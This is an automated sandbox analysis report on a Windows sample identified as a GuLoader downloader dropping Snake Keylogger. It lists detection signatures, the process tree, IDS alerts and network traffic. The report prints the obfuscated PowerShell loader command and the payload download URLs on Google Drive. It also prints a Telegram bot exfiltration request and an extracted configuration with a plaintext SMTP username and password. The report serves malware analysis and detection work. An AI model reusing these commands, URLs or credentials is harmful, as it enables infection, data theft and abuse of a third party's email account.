Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4PYRGCo1Di.exe

Overview

General Information

Sample name:4PYRGCo1Di.exe
renamed because original name is a hash value
Original sample name:7663def8e50e514bd22d33a3bf17cf9bdfd5cd4d9fb57ba6d5c4d88009e5f7a9.exe
Analysis ID:1632202
MD5:7032388fc7192e10a98a860844cfb1bc
SHA1:207ded51b45823675828c1be9567f43cf4c07e63
SHA256:7663def8e50e514bd22d33a3bf17cf9bdfd5cd4d9fb57ba6d5c4d88009e5f7a9
Tags:exesignedVIPKeyloggeruser-adrian__luca
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious PE digital signature
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 4PYRGCo1Di.exe (PID: 5368 cmdline: "C:\Users\user\Desktop\4PYRGCo1Di.exe" MD5: 7032388FC7192E10A98A860844CFB1BC)
    • powershell.exe (PID: 6520 cmdline: "powershell.exe" -windowstyle minimized "$nybyggedes=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Chancebilister.Kon';$Trichopteron=$nybyggedes.SubString(53919,3);.$Trichopteron($nybyggedes)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 5312 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • svchost.exe (PID: 4716 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "comercial@veyremaagricola.com", "Password": "Com@120613", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000003.00000002.2193215280.0000000020191000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000001.00000002.1207225710.0000000009B5A000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: msiexec.exe PID: 5312JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: msiexec.exe PID: 5312JoeSecurity_TelegramRATYara detected Telegram RATJoe Security

          System Summary

          barindex
          Source: Network ConnectionAuthor: frack113: Data: DesusertionIp: 216.58.212.174, DesusertionIsIpv6: false, DesusertionPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5312, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49687
          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6520, TargetFilename: C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Uncrude\4PYRGCo1Di.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$nybyggedes=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Chancebilister.Kon';$Trichopteron=$nybyggedes.SubString(53919,3);.$Trichopteron($nybyggedes)", CommandLine: "powershell.exe" -windowstyle minimized "$nybyggedes=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Chancebilister.Kon';$Trichopteron=$nybyggedes.SubString(53919,3);.$Trichopteron($nybyggedes)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\4PYRGCo1Di.exe", ParentImage: C:\Users\user\Desktop\4PYRGCo1Di.exe, ParentProcessId: 5368, ParentProcessName: 4PYRGCo1Di.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$nybyggedes=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Chancebilister.Kon';$Trichopteron=$nybyggedes.SubString(53919,3);.$Trichopteron($nybyggedes)", ProcessId: 6520, ProcessName: powershell.exe
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 616, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4716, ProcessName: svchost.exe
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-07T20:52:22.156075+010028033053Unknown Traffic192.168.2.949695104.21.16.1443TCP
          2025-03-07T20:52:33.340944+010028033053Unknown Traffic192.168.2.949699104.21.16.1443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-07T20:52:17.008289+010028032742Potentially Bad Traffic192.168.2.949693132.226.8.16980TCP
          2025-03-07T20:52:19.930193+010028032742Potentially Bad Traffic192.168.2.949693132.226.8.16980TCP
          2025-03-07T20:52:24.836499+010028032742Potentially Bad Traffic192.168.2.949696132.226.8.16980TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-07T20:52:09.133481+010028032702Potentially Bad Traffic192.168.2.949687216.58.212.174443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-07T20:53:01.132419+010018100071Potentially Bad Traffic192.168.2.949710149.154.167.220443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 4PYRGCo1Di.exeAvira: detected
          Source: C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Uncrude\4PYRGCo1Di.exeAvira: detection malicious, Label: TR/Injector.cgefa
          Source: 00000003.00000002.2193215280.0000000020191000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "comercial@veyremaagricola.com", "Password": "Com@120613", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
          Source: C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Uncrude\4PYRGCo1Di.exeReversingLabs: Detection: 50%
          Source: 4PYRGCo1Di.exeVirustotal: Detection: 69%Perma Link
          Source: 4PYRGCo1Di.exeReversingLabs: Detection: 50%

          Location Tracking

          barindex
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E87A8 CryptUnprotectData,3_2_046E87A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E8EF1 CryptUnprotectData,3_2_046E8EF1
          Source: 4PYRGCo1Di.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.9:49694 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 216.58.212.174:443 -> 192.168.2.9:49687 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.9:49690 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49710 version: TLS 1.2
          Source: 4PYRGCo1Di.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeCode function: 0_2_00406739 FindFirstFileW,FindClose,0_2_00406739
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeCode function: 0_2_00405AED GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AED
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeCode function: 0_2_00402902 FindFirstFileW,0_2_00402902
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0287F45Dh3_2_0287F2C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0287F45Dh3_2_0287F4AC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0287FC19h3_2_0287F974
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046BD069h3_2_046BCDC0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046B3308h3_2_046B2EF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046B2D41h3_2_046B2A90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_046B0040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046BEED1h3_2_046BEC28
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046BF781h3_2_046BF4D8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046BF329h3_2_046BF080
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046BFBD9h3_2_046BF930
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046BD919h3_2_046BD670
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046B3308h3_2_046B3236
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046BD4C1h3_2_046BD218
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046B3308h3_2_046B2EE6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046BDD71h3_2_046BDAC8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046BE621h3_2_046BE378
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046BE1C9h3_2_046BDF20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046B0D0Dh3_2_046B0B30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046B16F8h3_2_046B0B30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046BEA79h3_2_046BE7D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046E3709h3_2_046E3460
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046EBF0Fh3_2_046EBC40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046E7EB5h3_2_046E7B78
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046E9280h3_2_046E8FB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046E4D21h3_2_046E4A78
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046E7119h3_2_046E6E70
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046EF13Fh3_2_046EEE70
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046E02E9h3_2_046E0040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046E1CF9h3_2_046E1A50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046E9F1Fh3_2_046E9C50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046E48C9h3_2_046E4620
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046E62D9h3_2_046E6030
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046EDEFFh3_2_046EDC30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046E32B1h3_2_046E3008
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046EACCFh3_2_046EAA00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046E6CC1h3_2_046E6A18
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046EA3AFh3_2_046EA0E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046E0B99h3_2_046E08F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046E7571h3_2_046E72C8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046EE38Fh3_2_046EE0C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046E5179h3_2_046E4ED0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046EC39Fh3_2_046EC0D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046E2151h3_2_046E1EA8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046E6733h3_2_046E6488
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046ED14Fh3_2_046ECE80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046E0741h3_2_046E0498
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046EB15Fh3_2_046EAE90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046EC82Fh3_2_046EC560
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046EA83Fh3_2_046EA570
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046E0FF1h3_2_046E0D48
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046E2A01h3_2_046E2758
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046EE81Fh3_2_046EE550
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046E55D1h3_2_046E5328
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046E79C9h3_2_046E7720
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046EB5EFh3_2_046EB320
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046E25A9h3_2_046E2300
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046EF5CFh3_2_046EF300
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046ED5DFh3_2_046ED310
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046EECAFh3_2_046EE9E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046E18A1h3_2_046E15F8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046ECCBFh3_2_046EC9F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046E9A8Fh3_2_046E97C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046E5E81h3_2_046E5BD8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046E1449h3_2_046E11A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046EDA6Fh3_2_046ED7A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046E2E59h3_2_046E2BB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046EBA7Fh3_2_046EB7B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046E5A29h3_2_046E5780
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 046EFA5Fh3_2_046EF790
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 047047E8h3_2_04704478
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 04706B40h3_2_04706848
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 04704E90h3_2_04704B98
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0470A968h3_2_0470A670
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0470D470h3_2_0470D178
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 04705358h3_2_04705060
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0470EC59h3_2_0470E960
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 04707E60h3_2_04707B68
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 04701E37h3_2_04701B68
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 04709648h3_2_04709350
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0470C150h3_2_0470BE58
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 04703E27h3_2_04703B58
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 047002E7h3_2_04700040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0470D938h3_2_0470D640
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 04701517h3_2_04701248
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 04708328h3_2_04708030
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0470AE30h3_2_0470AB38
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 04703507h3_2_04703238
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0470C618h3_2_0470C320
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 04705820h3_2_04705528
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 04700BF7h3_2_04700928
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0470F120h3_2_0470EE28
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 04707008h3_2_04706D10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 04709B10h3_2_04709818
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 04702BE7h3_2_04702918
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0470B2F8h3_2_0470B000
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0470DE00h3_2_0470DB08
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 04705CE8h3_2_047059F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0470F5E8h3_2_0470F2F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 047087F0h3_2_047084F8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 047022C7h3_2_04701FF8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 04709FD8h3_2_04709CE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 047042B7h3_2_04703FE8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0470CAE0h3_2_0470C7E8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0470E2C8h3_2_0470DFD0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 047074D0h3_2_047071D8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 047019A7h3_2_047016D8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 04708CB8h3_2_047089C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0470B7C0h3_2_0470B4C8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 04703997h3_2_047036C8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0470CFA8h3_2_0470CCB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 047061B0h3_2_04705EB8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 04701087h3_2_04700DB8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0470FAB0h3_2_0470F7B8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 04707998h3_2_047076A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0470A4A0h3_2_0470A1A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 04703078h3_2_04702DA8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0470BC88h3_2_0470B990
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0470E790h3_2_0470E498
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 04700767h3_2_04700498
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 04706678h3_2_04706380
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 04709180h3_2_04708E88
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 04702757h3_2_04702488
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_06012A70
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_06012A80

          Networking

          barindex
          Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.9:49710 -> 149.154.167.220:443
          Source: unknownDNS query: name: api.telegram.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:701188%0D%0ADate%20and%20Time:%2009/03/2025%20/%2019:27:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20701188%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownDNS query: name: checkip.dyndns.org
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: unknownDNS query: name: checkip.dyndns.org
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49696 -> 132.226.8.169:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49693 -> 132.226.8.169:80
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49699 -> 104.21.16.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49695 -> 104.21.16.1:443
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49687 -> 216.58.212.174:443
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K4Ovv_8fSwESd7SpjTEkPKlS-EvSvyT- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1K4Ovv_8fSwESd7SpjTEkPKlS-EvSvyT-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
